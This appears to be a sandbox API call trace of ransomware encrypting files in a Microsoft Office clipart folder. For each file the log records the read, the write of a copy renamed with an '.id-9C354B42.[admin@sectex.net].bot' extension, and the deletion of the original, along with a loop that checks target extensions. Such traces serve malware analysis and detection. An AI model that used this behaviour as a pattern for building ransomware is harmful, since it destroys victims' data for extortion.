	[0141.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.373] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.373] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.378] GetLastError () returned 0x0
	[0141.378] ReadFile (in: hFile=0x3b4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x5b8, lpOverlapped=0x0) returned 1
	[0141.380] WriteFile (in: hFile=0x3ac, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x5c0, lpOverlapped=0x0) returned 1
	[0141.381] ReadFile (in: hFile=0x3b4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.381] WriteFile (in: hFile=0x3ac, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.381] SetEndOfFile (hFile=0x3ac) returned 1
	[0141.381] CloseHandle (hObject=0x3ac) returned 1
	[0141.381] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.381] SetEndOfFile (hFile=0x3b4) returned 1
	[0141.383] CloseHandle (hObject=0x3b4) returned 1
	[0141.383] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.492] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf")) returned 1
	[0141.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63
	[0141.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63
	[0141.569] lstrlenW (lpString=".doc") returned 4
	[0141.569] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.569] lstrlenW (lpString=".docx") returned 5
	[0141.569] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.569] lstrlenW (lpString=".pdf") returned 4
	[0141.569] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.569] lstrlenW (lpString=".xls") returned 4
	[0141.569] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.569] lstrlenW (lpString=".xlsx") returned 5
	[0141.569] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.569] lstrlenW (lpString=".ppt") returned 4
	[0141.569] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63
	[0141.570] lstrlenW (lpString=".zip") returned 4
	[0141.570] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.570] lstrlenW (lpString=".rar") returned 4
	[0141.570] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.570] lstrlenW (lpString=".bz2") returned 4
	[0141.570] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.570] lstrlenW (lpString=".7z") returned 3
	[0141.570] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63
	[0141.570] lstrlenW (lpString=".dbf") returned 4
	[0141.570] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63
	[0141.570] lstrlenW (lpString=".1cd") returned 4
	[0141.570] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63
	[0141.570] lstrlenW (lpString=".jpg") returned 4
	[0141.570] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63
	[0141.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63
	[0141.570] lstrlenW (lpString=".doc") returned 4
	[0141.570] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.570] lstrlenW (lpString=".docx") returned 5
	[0141.570] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.570] lstrlenW (lpString=".pdf") returned 4
	[0141.570] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.570] lstrlenW (lpString=".xls") returned 4
	[0141.570] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.570] lstrlenW (lpString=".xlsx") returned 5
	[0141.570] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.570] lstrlenW (lpString=".ppt") returned 4
	[0141.570] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63
	[0141.570] lstrlenW (lpString=".zip") returned 4
	[0141.570] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.571] lstrlenW (lpString=".rar") returned 4
	[0141.571] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.571] lstrlenW (lpString=".bz2") returned 4
	[0141.571] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.571] lstrlenW (lpString=".7z") returned 3
	[0141.571] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63
	[0141.571] lstrlenW (lpString=".dbf") returned 4
	[0141.571] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63
	[0141.571] lstrlenW (lpString=".1cd") returned 4
	[0141.571] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF") returned 63
	[0141.571] lstrlenW (lpString=".jpg") returned 4
	[0141.571] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.571] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.571] lstrlenW (lpString="BL00248_.WMF") returned 12
	[0141.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0141.572] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=1536) returned 1
	[0141.572] CloseHandle (hObject=0x3cc) returned 1
	[0141.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf")) returned 0x20
	[0141.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0141.572] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.572] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0141.573] GetLastError () returned 0x0
	[0141.573] ReadFile (in: hFile=0x3cc, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x600, lpOverlapped=0x0) returned 1
	[0141.581] WriteFile (in: hFile=0x3d0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x610, lpOverlapped=0x0) returned 1
	[0141.582] ReadFile (in: hFile=0x3cc, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.582] WriteFile (in: hFile=0x3d0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.582] SetEndOfFile (hFile=0x3d0) returned 1
	[0141.585] CloseHandle (hObject=0x3d0) returned 1
	[0141.585] SetFilePointerEx (in: hFile=0x3cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.585] SetEndOfFile (hFile=0x3cc) returned 1
	[0141.587] CloseHandle (hObject=0x3cc) returned 1
	[0141.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.623] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00248_.wmf")) returned 1
	[0141.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63
	[0141.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63
	[0141.624] lstrlenW (lpString=".doc") returned 4
	[0141.624] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.624] lstrlenW (lpString=".docx") returned 5
	[0141.624] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.624] lstrlenW (lpString=".pdf") returned 4
	[0141.624] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.624] lstrlenW (lpString=".xls") returned 4
	[0141.624] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.624] lstrlenW (lpString=".xlsx") returned 5
	[0141.624] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.624] lstrlenW (lpString=".ppt") returned 4
	[0141.624] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63
	[0141.624] lstrlenW (lpString=".zip") returned 4
	[0141.624] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.624] lstrlenW (lpString=".rar") returned 4
	[0141.624] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.624] lstrlenW (lpString=".bz2") returned 4
	[0141.624] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.624] lstrlenW (lpString=".7z") returned 3
	[0141.624] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63
	[0141.625] lstrlenW (lpString=".dbf") returned 4
	[0141.625] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63
	[0141.625] lstrlenW (lpString=".1cd") returned 4
	[0141.625] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63
	[0141.625] lstrlenW (lpString=".jpg") returned 4
	[0141.625] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63
	[0141.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63
	[0141.625] lstrlenW (lpString=".doc") returned 4
	[0141.625] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.625] lstrlenW (lpString=".docx") returned 5
	[0141.625] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.625] lstrlenW (lpString=".pdf") returned 4
	[0141.625] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.625] lstrlenW (lpString=".xls") returned 4
	[0141.625] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.625] lstrlenW (lpString=".xlsx") returned 5
	[0141.625] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.625] lstrlenW (lpString=".ppt") returned 4
	[0141.625] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63
	[0141.625] lstrlenW (lpString=".zip") returned 4
	[0141.625] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.625] lstrlenW (lpString=".rar") returned 4
	[0141.625] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.625] lstrlenW (lpString=".bz2") returned 4
	[0141.625] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.625] lstrlenW (lpString=".7z") returned 3
	[0141.625] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63
	[0141.625] lstrlenW (lpString=".dbf") returned 4
	[0141.625] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63
	[0141.626] lstrlenW (lpString=".1cd") returned 4
	[0141.626] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 63
	[0141.626] lstrlenW (lpString=".jpg") returned 4
	[0141.626] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.626] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.626] lstrlenW (lpString="BL00265_.WMF") returned 12
	[0141.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0141.632] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=5752) returned 1
	[0141.633] CloseHandle (hObject=0x3b8) returned 1
	[0141.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf")) returned 0x20
	[0141.671] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.671] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.671] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.671] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0141.672] GetLastError () returned 0x0
	[0141.672] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1678, lpOverlapped=0x0) returned 1
	[0141.676] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1680, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1680, lpOverlapped=0x0) returned 1
	[0141.677] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.677] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.677] SetEndOfFile (hFile=0x3b8) returned 1
	[0141.677] CloseHandle (hObject=0x3b8) returned 1
	[0141.677] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.677] SetEndOfFile (hFile=0x31c) returned 1
	[0141.680] CloseHandle (hObject=0x31c) returned 1
	[0141.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.680] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf")) returned 1
	[0141.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63
	[0141.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63
	[0141.681] lstrlenW (lpString=".doc") returned 4
	[0141.681] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.681] lstrlenW (lpString=".docx") returned 5
	[0141.681] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.681] lstrlenW (lpString=".pdf") returned 4
	[0141.681] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.681] lstrlenW (lpString=".xls") returned 4
	[0141.681] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.681] lstrlenW (lpString=".xlsx") returned 5
	[0141.681] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.681] lstrlenW (lpString=".ppt") returned 4
	[0141.681] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63
	[0141.681] lstrlenW (lpString=".zip") returned 4
	[0141.681] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.681] lstrlenW (lpString=".rar") returned 4
	[0141.681] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.681] lstrlenW (lpString=".bz2") returned 4
	[0141.681] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.681] lstrlenW (lpString=".7z") returned 3
	[0141.681] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63
	[0141.681] lstrlenW (lpString=".dbf") returned 4
	[0141.681] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63
	[0141.681] lstrlenW (lpString=".1cd") returned 4
	[0141.681] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63
	[0141.681] lstrlenW (lpString=".jpg") returned 4
	[0141.681] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63
	[0141.681] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63
	[0141.682] lstrlenW (lpString=".doc") returned 4
	[0141.682] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.682] lstrlenW (lpString=".docx") returned 5
	[0141.682] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.682] lstrlenW (lpString=".pdf") returned 4
	[0141.682] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.682] lstrlenW (lpString=".xls") returned 4
	[0141.682] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.682] lstrlenW (lpString=".xlsx") returned 5
	[0141.682] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.682] lstrlenW (lpString=".ppt") returned 4
	[0141.682] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63
	[0141.682] lstrlenW (lpString=".zip") returned 4
	[0141.682] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.682] lstrlenW (lpString=".rar") returned 4
	[0141.682] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.682] lstrlenW (lpString=".bz2") returned 4
	[0141.682] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.682] lstrlenW (lpString=".7z") returned 3
	[0141.682] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63
	[0141.682] lstrlenW (lpString=".dbf") returned 4
	[0141.682] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63
	[0141.682] lstrlenW (lpString=".1cd") returned 4
	[0141.682] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned 63
	[0141.682] lstrlenW (lpString=".jpg") returned 4
	[0141.682] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.682] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.683] lstrlenW (lpString="BL00267_.WMF") returned 12
	[0141.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0141.683] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2644) returned 1
	[0141.683] CloseHandle (hObject=0x31c) returned 1
	[0141.683] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf")) returned 0x20
	[0141.683] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
